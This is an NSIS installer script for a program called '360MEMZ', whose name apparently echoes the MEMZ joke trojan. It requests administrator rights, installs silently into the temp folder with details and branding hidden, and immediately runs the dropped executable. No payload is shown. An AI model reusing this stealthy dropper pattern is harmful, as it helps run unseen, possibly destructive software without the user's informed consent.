; This script is totally not generated by the HM NIS Edit Script Wizard.

;!region manifest
RequestExecutionLevel admin ; behaviour: copying dll to system32
Unicode true

;!region pe data
Icon "WinMain\360MEMZ.ico"
!define LANG_ENGLISH 1033
VIAddVersionKey /LANG=${LANG_ENGLISH} "ProductName" "360MEMZ"
VIAddVersionKey /LANG=${LANG_ENGLISH} "Comments" "360MEMZ"
VIAddVersionKey /LANG=${LANG_ENGLISH} "CompanyName" "GT428"
VIAddVersionKey /LANG=${LANG_ENGLISH} "LegalTrademarks" "360MEMZ"
VIAddVersionKey /LANG=${LANG_ENGLISH} "LegalCopyright" "360MEMZ"
VIAddVersionKey /LANG=${LANG_ENGLISH} "FileDescription" "360MEMZ"
VIAddVersionKey /LANG=${LANG_ENGLISH} "FileVersion" "0.1"
VIProductVersion 0.0.0.1
XPStyle on

;!region installer settings
LoadLanguageFile "${NSISDIR}\Contrib\Language files\SimpChinese.nlf"

Name "360MEMZ"
BrandingText " "
Caption "360MEMZ"
MiscButtonText "..." "..." "..."
SpaceTexts ""
OutFile "360MEMZ.exe"
InstallDir "$TEMP\360MEMZ" ;!warning!
ShowInstDetails nevershow
WindowIcon off

Function .onInit
	System::Call 'kernel32::CreateMutex(p 0, i 0, t "NSISIs360MEMZInstallerAlreadyRunning") p .r1 ?e'
	Pop $R0

	StrCmp $R0 0 +2
		Abort
FunctionEnd

;!region install
Section
	SetOutPath "$INSTDIR"
	;SetOverwrite ifnewer ; WON'T APPLY!
	IfFileExists "$INSTDIR\*.*" 0 +2
		RMDir /r "$INSTDIR" ; WARNING!
	File "Build\*.*" ; WARNING!
	ExecShell "open" "$INSTDIR\360MEMZ.exe"
SectionEnd